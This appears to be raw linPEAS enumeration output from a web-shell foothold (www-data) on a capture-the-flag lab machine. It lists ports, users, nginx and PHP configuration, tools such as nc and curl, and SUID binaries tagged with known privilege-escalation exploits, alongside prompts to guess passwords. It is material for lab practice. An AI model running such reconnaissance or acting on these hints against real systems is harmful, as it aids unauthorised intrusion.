╔══════════╣ Content of /etc/inetd.conf & /etc/xinetd.conf
/etc/inetd.conf Not Found

╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
  inet 10.129.18.131 netmask 255.255.0.0 broadcast 10.129.255.255
  inet6 fe80::250:56ff:feb9:6684 prefixlen 64 scopeid 0x20<link>
  inet6 dead:beef::250:56ff:feb9:6684 prefixlen 64 scopeid 0x0<global>
  ether 00:50:56:b9:66:84 txqueuelen 1000 (Ethernet)
  RX packets 30700 bytes 32636656 (32.6 MB)
  RX errors 0 dropped 0 overruns 0 frame 0
  TX packets 20991 bytes 2787551 (2.7 MB)
  TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
  inet 127.0.0.1 netmask 255.0.0.0
  inet6 ::1 prefixlen 128 scopeid 0x10<host>
  loop txqueuelen 1000 (Local Loopback)
  RX packets 12767 bytes 1125794 (1.1 MB)
  RX errors 0 dropped 0 overruns 0 frame 0
  TX packets 12767 bytes 1125794 (1.1 MB)
  TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

╔══════════╣ Networks and neighbours
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default 10.129.0.1 0.0.0.0 UG 0 0 0 eth0
10.129.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth0
|
|
Address HWtype HWaddress Flags Mask Iface
╔══════════╣ Iptables rules
iptables rules Not Found

╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 1627/nginx: worker
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN 1759/node
tcp6 0 0 :::80 :::* LISTEN 1627/nginx: worker
tcp6 0 0 :::22 :::* LISTEN -

╔══════════╣ Can I sniff with tcpdump?
No

╔══════════╣ Internet Access?
Ping is not available
Port 80 is not accessible
Port 443 is not accessible
DNS not available

╔══════════╣ Scanning local networks (using /24)
══╣ Discovering hosts in 10.129.18.131/24
══╣ Scanning top ports of host.docker.internal


╔═══════════════════╗
═══════════════════════════════╣ Users Information ╠═══════════════════════════════
╚═══════════════════╝
╔══════════╣ My user
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users
uid=33(www-data) gid=33(www-data) groups=33(www-data)

╔══════════╣ Do I have PGP keys?
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found

╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid

╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens
ptrace protection is enabled (1)
gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it

╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2

[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin

╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash

╔══════════╣ Users with console
dev:x:1000:1000:,,,:/home/dev:/bin/bash
root:x:0:0:root:/root:/bin/bash

╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=1000(dev) gid=1000(dev) groups=1000(dev)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm)
uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=106(uuidd) gid=110(uuidd) groups=110(uuidd)
uid=107(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=108(landscape) gid=112(landscape) groups=112(landscape)
uid=109(pollinate) gid=1(daemon) groups=1(daemon)
uid=110(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=999(_laurel) gid=999(_laurel) groups=999(_laurel)

╔══════════╣ Login now
11:35:20 up 2:37, 0 users, load average: 19.85, 21.69, 12.65
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT

╔══════════╣ Last logons
reboot system boot Sun Feb 12 08:57:45 2023 still running 0.0.0.0
dev pts/0 Wed Feb 8 12:55:27 2023 - Wed Feb 8 12:57:32 2023 (00:02) 10.10.14.23
reboot system boot Wed Feb 8 12:55:01 2023 - Wed Feb 8 12:57:32 2023 (00:02) 0.0.0.0
dev pts/0 Wed Feb 8 12:46:06 2023 - Wed Feb 8 12:48:54 2023 (00:02) 10.10.14.23
reboot system boot Wed Feb 8 12:45:38 2023 - Wed Feb 8 12:48:54 2023 (00:03) 0.0.0.0
dev pts/0 Wed Feb 8 12:14:41 2023 - Wed Feb 8 12:16:08 2023 (00:01) 10.10.14.23
reboot system boot Wed Feb 8 12:14:20 2023 - Wed Feb 8 12:16:09 2023 (00:01) 0.0.0.0

wtmp begins Wed Feb 8 12:14:20 2023

╔══════════╣ Last time logon each user
Username Port From Latest
dev pts/0 10.10.14.23 Wed Feb 8 12:55:27 +0000 2023

╔══════════╣ Password policy
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512

╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)

╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!


╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════
╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/g++
/usr/bin/gcc
/usr/bin/lxc
/usr/bin/make
/bin/nc
/bin/netcat
/usr/bin/perl
/usr/bin/php
/bin/ping
/usr/bin/python3
/usr/bin/python3.6
/usr/bin/sudo
/usr/bin/wget

╔══════════╣ Installed Compilers
ii g++ 4:7.4.0-1ubuntu2.3 amd64 GNU C++ compiler
ii g++-7 7.5.0-3ubuntu1~18.04 amd64 GNU C++ compiler
ii gcc 4:7.4.0-1ubuntu2.3 amd64 GNU C compiler
ii gcc-7 7.5.0-3ubuntu1~18.04 amd64 GNU C compiler
/usr/bin/gcc
/usr/bin/g++

╔══════════╣ Searching mysql credentials and exec

╔══════════╣ Analyzing Apache-Nginx Files (limit 70)
Apache version: Server version: Apache/2.4.29 (Ubuntu)
Server built: 2023-01-31T14:01:53
httpd Not Found

Nginx version:
/etc/apache2/mods-available/php7.4.conf-<FilesMatch ".+\.ph(ar|p|tml)$">
/etc/apache2/mods-available/php7.4.conf: SetHandler application/x-httpd-php
--
/etc/apache2/mods-available/php7.4.conf-<FilesMatch ".+\.phps$">
/etc/apache2/mods-available/php7.4.conf: SetHandler application/x-httpd-php-source
--
/etc/apache2/mods-enabled/php7.4.conf-<FilesMatch ".+\.ph(ar|p|tml)$">
/etc/apache2/mods-enabled/php7.4.conf: SetHandler application/x-httpd-php
--
/etc/apache2/mods-enabled/php7.4.conf-<FilesMatch ".+\.phps$">
/etc/apache2/mods-enabled/php7.4.conf: SetHandler application/x-httpd-php-source
══╣ Nginx modules
ngx_http_geoip_module.so
ngx_http_image_filter_module.so
ngx_http_xslt_filter_module.so
ngx_mail_module.so
ngx_stream_module.so
══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 Jan 16 09:49 /etc/apache2/sites-enabled
drwxr-xr-x 2 root root 4096 Jan 16 09:49 /etc/apache2/sites-enabled
lrwxrwxrwx 1 root root 35 Nov 20 21:53 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
    ServerAdmin webmaster@localhost
    DocumentRoot /var/www/html
    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

drwxr-xr-x 2 root root 4096 Jan 16 09:49 /etc/nginx/sites-enabled
drwxr-xr-x 2 root root 4096 Jan 16 09:49 /etc/nginx/sites-enabled
lrwxrwxrwx 1 root root 34 Nov 20 21:46 /etc/nginx/sites-enabled/default -> /etc/nginx/sites-available/default
server {
    listen 80 default_server;
    listen [::]:80 default_server;
    root /var/www/html;
    index index.html index.htm index.nginx-debian.html;
    server_name _;
    location / {
        proxy_pass http://127.0.0.1:3000/;
    }
}
server {
    listen 80;
    listen [::]:80;
    server_name prd.m.rendering-api.interface.htb;
    root /var/www/api;
    index index.php;
    location / {
        fastcgi_pass unix:/run/php/php7.4-fpm.sock;
        fastcgi_param SCRIPT_FILENAME $realpath_root$fastcgi_script_name;
        include fastcgi_params;
        try_files $uri $uri/ /index.php;
    }
}


-rw-r--r-- 1 root root 1332 Feb 23 2021 /etc/apache2/sites-available/000-default.conf
<VirtualHost *:80>
    ServerAdmin webmaster@localhost
    DocumentRoot /var/www/html
    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
lrwxrwxrwx 1 root root 35 Nov 20 21:53 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
    ServerAdmin webmaster@localhost
    DocumentRoot /var/www/html
    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

-rw-r--r-- 1 root root 73002 Nov 8 11:33 /etc/php/7.4/apache2/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r-- 1 root root 72600 Nov 8 11:33 /etc/php/7.4/cli/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r-- 1 root root 73002 Nov 8 11:33 /etc/php/7.4/fpm/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On

-rw-r--r-- 1 root root 1482 Apr 6 2018 /etc/nginx/nginx.conf
user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;
events {
    worker_connections 768;
}
http {
    sendfile on;
    tcp_nopush on;
    tcp_nodelay on;
    keepalive_timeout 65;
    types_hash_max_size 2048;
    include /etc/nginx/mime.types;
    default_type application/octet-stream;
    ssl_prefer_server_ciphers on;
    access_log /var/log/nginx/access.log;
    error_log /var/log/nginx/error.log;
    gzip on;
    include /etc/nginx/conf.d/*.conf;
    include /etc/nginx/sites-enabled/*;
}

-rw-r--r-- 1 root root 389 Apr 6 2018 /etc/default/nginx

-rwxr-xr-x 1 root root 4579 Apr 6 2018 /etc/init.d/nginx

-rw-r--r-- 1 root root 329 Apr 6 2018 /etc/logrotate.d/nginx

drwxr-xr-x 8 root root 4096 Jan 16 09:49 /etc/nginx
-rw-r--r-- 1 root root 1482 Apr 6 2018 /etc/nginx/nginx.conf
user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;
events {
    worker_connections 768;
}
http {
    sendfile on;
    tcp_nopush on;
    tcp_nodelay on;
    keepalive_timeout 65;
    types_hash_max_size 2048;
    include /etc/nginx/mime.types;
    default_type application/octet-stream;
    ssl_prefer_server_ciphers on;
    access_log /var/log/nginx/access.log;
    error_log /var/log/nginx/error.log;
    gzip on;
    include /etc/nginx/conf.d/*.conf;
    include /etc/nginx/sites-enabled/*;
}
lrwxrwxrwx 1 root root 61 Nov 20 21:46 /etc/nginx/modules-enabled/50-mod-http-image-filter.conf -> /usr/share/nginx/modules-available/mod-http-image-filter.conf
load_module modules/ngx_http_image_filter_module.so;
lrwxrwxrwx 1 root root 48 Nov 20 21:46 /etc/nginx/modules-enabled/50-mod-mail.conf -> /usr/share/nginx/modules-available/mod-mail.conf
load_module modules/ngx_mail_module.so;
lrwxrwxrwx 1 root root 50 Nov 20 21:46 /etc/nginx/modules-enabled/50-mod-stream.conf -> /usr/share/nginx/modules-available/mod-stream.conf
load_module modules/ngx_stream_module.so;
lrwxrwxrwx 1 root root 60 Nov 20 21:46 /etc/nginx/modules-enabled/50-mod-http-xslt-filter.conf -> /usr/share/nginx/modules-available/mod-http-xslt-filter.conf
load_module modules/ngx_http_xslt_filter_module.so;
lrwxrwxrwx 1 root root 54 Nov 20 21:46 /etc/nginx/modules-enabled/50-mod-http-geoip.conf -> /usr/share/nginx/modules-available/mod-http-geoip.conf
load_module modules/ngx_http_geoip_module.so;
-rw-r--r-- 1 root root 217 Apr 6 2018 /etc/nginx/snippets/snakeoil.conf
ssl_certificate /etc/ssl/certs/ssl-cert-snakeoil.pem;
ssl_certificate_key /etc/ssl/private/ssl-cert-snakeoil.key;
-rw-r--r-- 1 root root 422 Apr 6 2018 /etc/nginx/snippets/fastcgi-php.conf
fastcgi_split_path_info ^(.+\.php)(/.+)$;
try_files $fastcgi_script_name =404;
set $path_info $fastcgi_path_info;
fastcgi_param PATH_INFO $path_info;
fastcgi_index index.php;
include fastcgi.conf;
-rw-r--r-- 1 root root 1077 Apr 6 2018 /etc/nginx/fastcgi.conf
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
fastcgi_param QUERY_STRING $query_string;
fastcgi_param REQUEST_METHOD $request_method;
fastcgi_param CONTENT_TYPE $content_type;
fastcgi_param CONTENT_LENGTH $content_length;
fastcgi_param SCRIPT_NAME $fastcgi_script_name;
fastcgi_param REQUEST_URI $request_uri;
fastcgi_param DOCUMENT_URI $document_uri;
fastcgi_param DOCUMENT_ROOT $document_root;
fastcgi_param SERVER_PROTOCOL $server_protocol;
fastcgi_param REQUEST_SCHEME $scheme;
fastcgi_param HTTPS $https if_not_empty;
fastcgi_param GATEWAY_INTERFACE CGI/1.1;
fastcgi_param SERVER_SOFTWARE nginx/$nginx_version;
fastcgi_param REMOTE_ADDR $remote_addr;
fastcgi_param REMOTE_PORT $remote_port;
fastcgi_param SERVER_ADDR $server_addr;
fastcgi_param SERVER_PORT $server_port;
fastcgi_param SERVER_NAME $server_name;
fastcgi_param REDIRECT_STATUS 200;

-rw-r--r-- 1 root root 374 Apr 6 2018 /etc/ufw/applications.d/nginx

drwxr-xr-x 3 root root 4096 Nov 20 21:46 /usr/lib/nginx

-rwxr-xr-x 1 root root 1149096 Nov 10 06:38 /usr/sbin/nginx

drwxr-xr-x 2 root root 4096 Jan 16 09:49 /usr/share/doc/nginx

drwxr-xr-x 4 root root 4096 Nov 20 21:46 /usr/share/nginx
-rw-r--r-- 1 root root 52 Nov 10 06:38 /usr/share/nginx/modules-available/mod-http-xslt-filter.conf
load_module modules/ngx_http_xslt_filter_module.so;
-rw-r--r-- 1 root root 46 Nov 10 06:38 /usr/share/nginx/modules-available/mod-http-geoip.conf
load_module modules/ngx_http_geoip_module.so;
-rw-r--r-- 1 root root 42 Nov 10 06:38 /usr/share/nginx/modules-available/mod-stream.conf
load_module modules/ngx_stream_module.so;
-rw-r--r-- 1 root root 40 Nov 10 06:38 /usr/share/nginx/modules-available/mod-mail.conf
load_module modules/ngx_mail_module.so;
-rw-r--r-- 1 root root 53 Nov 10 06:38 /usr/share/nginx/modules-available/mod-http-image-filter.conf
load_module modules/ngx_http_image_filter_module.so;

drwxr-xr-x 7 root root 4096 Jan 16 09:49 /var/lib/nginx

drwxr-xr-x 2 root adm 4096 Feb 8 12:14 /var/log/nginx


╔══════════╣ Analyzing FastCGI Files (limit 70)
-rw-r--r-- 1 root root 1007 Apr 6 2018 /etc/nginx/fastcgi_params

╔══════════╣ Analyzing Rsync Files (limit 70)
-rw-r--r-- 1 root root 1044 Aug 16 18:38 /usr/share/doc/rsync/examples/rsyncd.conf
[ftp]
comment = public archive
path = /var/www/pub
use chroot = yes
lock file = /var/lock/rsyncd
read only = yes
list = yes
uid = nobody
gid = nogroup
strict modes = yes
ignore errors = no
ignore nonreadable = yes
transfer logging = no
timeout = 600
refuse options = checksum dry-run
dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz


╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'
drwxr-xr-x 2 root root 4096 Jan 16 09:49 /etc/ldap


╔══════════╣ Searching ssl/ssh files
ChallengeResponseAuthentication no
UsePAM yes
PasswordAuthentication yes
══╣ Some certificates were found (out limited):
/etc/pollinate/entropy.ubuntu.com.pem
44091PSTORAGE_CERTSBIN

══╣ Some home ssh config file was found
/usr/share/openssh/sshd_config
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server

══╣ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow


Searching inside /etc/ssh/ssh_config for interesting info
Host *
SendEnv LANG LC_*
HashKnownHosts yes
GSSAPIAuthentication yes

╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 Feb 6 10:01 /etc/pam.d
-rw-r--r-- 1 root root 2133 Mar 30 2022 /etc/pam.d/sshd


╔══════════╣ Searching tmux sessions
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-shell-sessions
tmux 2.6


/tmp/tmux-33
╔══════════╣ Analyzing Cloud Init Files (limit 70)
-rw-r--r-- 1 root root 3659 Nov 28 16:50 /etc/cloud/cloud.cfg
lock_passwd: True

╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 4096 Feb 6 10:00 /usr/share/keyrings


╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd

╔══════════╣ Analyzing Github Files (limit 70)
|
|
drwxr-xr-x 3 root root 4096 Nov 20 22:05 /usr/lib/node_modules/npm/node_modules/meant/.github
drwxr-xr-x 3 root root 4096 Nov 20 22:05 /usr/lib/node_modules/npm/node_modules/node-gyp/.github
drwxr-xr-x 2 root root 4096 Feb 6 10:01 /usr/lib/node_modules/npm/node_modules/npm-normalize-package-bin/.github
drwxr-xr-x 3 www-data www-data 4096 Nov 20 21:59 /var/www/api/vendor/bramus/router/.github
drwxr-xr-x 3 www-data www-data 4096 Nov 20 21:59 /var/www/api/vendor/phenx/php-font-lib/.github
drwxr-xr-x 3 www-data www-data 4096 Nov 20 21:59 /var/www/api/vendor/sabberworm/php-css-parser/.github
drwxr-xr-x 8 www-data www-data 4096 Nov 20 21:59 /var/www/api/vendor/bramus/router/.git
drwxr-xr-x 8 www-data www-data 4096 Nov 20 21:59 /var/www/api/vendor/dompdf/dompdf/.git
drwxr-xr-x 8 www-data www-data 4096 Nov 20 21:59 /var/www/api/vendor/phenx/php-font-lib/.git
drwxr-xr-x 8 www-data www-data 4096 Nov 20 21:59 /var/www/api/vendor/phenx/php-svg-lib/.git
drwxr-xr-x 8 www-data www-data 4096 Nov 20 21:59 /var/www/api/vendor/sabberworm/php-css-parser/.git
╔══════════╣ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found
-rw-r--r-- 1 root root 360 Nov 20 21:52 /etc/apt/trusted.gpg.d/ondrej_ubuntu_php.gpg
-rw-r--r-- 1 root root 2796 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
-rw-r--r-- 1 root root 2794 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
-rw-r--r-- 1 root root 1733 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
-rw-r--r-- 1 root root 3267 Jul 4 2022 /usr/share/gnupg/distsigkey.gpg
-rw-r--r-- 1 root root 2206 Nov 20 22:04 /usr/share/keyrings/nodesource.gpg
-rw-r--r-- 1 root root 2247 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-cc-eal.gpg
-rw-r--r-- 1 root root 2274 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-cis.gpg
-rw-r--r-- 1 root root 2236 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-esm-apps.gpg
-rw-r--r-- 1 root root 2264 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-esm-infra-trusty.gpg
-rw-r--r-- 1 root root 2275 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-fips.gpg
-rw-r--r-- 1 root root 2250 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-realtime-kernel.gpg
-rw-r--r-- 1 root root 2235 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-ros.gpg
-rw-r--r-- 1 root root 7399 Sep 17 2018 /usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27 2016 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 4097 Feb 6 2018 /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
-rw-r--r-- 1 root root 0 Jan 17 2018 /usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
-rw-r--r-- 1 root root 1227 May 27 2010 /usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 2867 Feb 22 2018 /usr/share/popularity-contest/debian-popcon.gpg
-rw-r--r-- 1 root root 2236 Feb 8 12:14 /var/lib/ubuntu-advantage/apt-esm/etc/apt/trusted.gpg.d/ubuntu-advantage-esm-apps.gpg
-rw------- 1 www-data www-data 1200 Feb 12 10:54 /var/www/.gnupg/trustdb.gpg
drwx------ 3 dev dev 4096 Jan 16 09:49 /home/dev/.gnupg
drwx------ 3 www-data www-data 4096 Feb 12 10:54 /var/www/.gnupg
╔══════════╣ Analyzing Postfix Files (limit 70)
-rw-r--r-- 1 root root 675 Apr 2 2018 /usr/share/bash-completion/completions/postfix
╔══════════╣ Analyzing FTP Files (limit 70)
-rw-r--r-- 1 root root 69 Nov 8 11:33 /etc/php/7.4/mods-available/ftp.ini
-rw-r--r-- 1 root root 69 Oct 28 17:39 /etc/php/8.1/mods-available/ftp.ini
-rw-r--r-- 1 root root 69 Jan 6 15:17 /etc/php/8.2/mods-available/ftp.ini
-rw-r--r-- 1 root root 69 Jan 13 10:42 /usr/share/php7.4-common/common/ftp.ini
-rw-r--r-- 1 root root 69 Feb 3 09:35 /usr/share/php8.2-common/common/ftp.ini
╔══════════╣ Analyzing Bind Files (limit 70)
-rw-r--r-- 1 root root 856 Apr 2 2018 /usr/share/bash-completion/completions/bind
-rw-r--r-- 1 root root 856 Apr 2 2018 /usr/share/bash-completion/completions/bind
╔══════════╣ Analyzing Interesting logs Files (limit 70)
-rw-r--r-- 1 root root 8939 Feb 12 10:42 /var/log/nginx/access.log
-rw-r--r-- 1 root root 34729 Feb 12 10:42 /var/log/nginx/error.log
╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 root root 3771 Apr 4 2018 /etc/skel/.bashrc
-rw-r--r-- 1 dev dev 3771 Jan 10 12:55 /home/dev/.bashrc
-rw-r--r-- 1 root root 807 Apr 4 2018 /etc/skel/.profile
-rw-r--r-- 1 dev dev 807 Jan 10 12:55 /home/dev/.profile
╔═══════════════════╗
═══════════════════════════════╣ Interesting Files ╠═══════════════════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 43K Sep 16 2020 /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 63K Jun 28 2019 /bin/ping
-rwsr-xr-x 1 root root 31K Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 27K Sep 16 2020 /bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 44K Nov 29 12:25 /bin/su
-rwsr-xr-x 1 root root 59K Nov 29 12:25 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 75K Nov 29 12:25 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 146K Jan 16 14:40 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 37K Nov 29 12:25 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 19K Jun 28 2019 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 40K Nov 29 12:25 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 37K Nov 29 12:25 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 44K Nov 29 12:25 /usr/bin/chsh
-rwsr-xr-x 1 root root 75K Nov 29 12:25 /usr/bin/gpasswd
-rwsr-sr-x 1 daemon daemon 51K Feb 20 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 99K Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-- 1 root messagebus 42K Oct 25 13:03 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 128K Dec 1 08:52 /usr/lib/snapd/snap-confine ---> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-x 1 root root 427K Mar 30 2022 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 14K Jan 12 2022 /usr/lib/policykit-1/polkit-agent-helper-1
╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root ssh 355K Mar 30 2022 /usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 31K Sep 16 2020 /usr/bin/wall
-rwxr-sr-x 1 root shadow 23K Nov 29 12:25 /usr/bin/expiry
-rwxr-sr-x 1 root mlocate 43K Mar 1 2018 /usr/bin/mlocate
-rwxr-sr-x 1 root shadow 71K Nov 29 12:25 /usr/bin/chage
-rwxr-sr-x 1 root tty 14K Jan 17 2018 /usr/bin/bsd-write
-rwxr-sr-x 1 root crontab 39K May 10 2022 /usr/bin/crontab
-rwsr-sr-x 1 daemon daemon 51K Feb 20 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwxr-sr-x 1 root utmp 10K Mar 11 2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root shadow 34K Feb 2 09:24 /sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 34K Feb 2 09:24 /sbin/unix_chkpwd
╔══════════╣ Checking misconfigurations of ld.so
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld-so
/etc/ld.so.conf
include /etc/ld.so.conf.d/*.conf
/etc/ld.so.conf.d
/etc/ld.so.conf.d/libc.conf
/usr/local/lib
/etc/ld.so.conf.d/x86_64-linux-gnu.conf
/usr/local/lib/x86_64-linux-gnu
/lib/x86_64-linux-gnu
/usr/lib/x86_64-linux-gnu
╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
Current env capabilities:
Current: =
Current proc capabilities:
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
Parent Shell capabilities:
0x0000000000000000=
Files with capabilities (limited to 50):
/usr/bin/mtr-packet = cap_net_raw+ep
╔══════════╣ Users with capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
╔══════════╣ AppArmor binary profiles
-rw-r--r-- 1 root root 3194 Mar 26 2018 sbin.dhclient
-rw-r--r-- 1 root root 125 Nov 23 2018 usr.bin.lxc-start
-rw-r--r-- 1 root root 2857 Apr 7 2018 usr.bin.man
-rw-r--r-- 1 root root 28486 Nov 28 04:56 usr.lib.snapd.snap-confine.real
-rw-r--r-- 1 root root 1550 Apr 24 2018 usr.sbin.rsyslogd
-rw-r--r-- 1 root root 1353 Mar 31 2018 usr.sbin.tcpdump
╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls
files with acls in searched folders Not Found
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
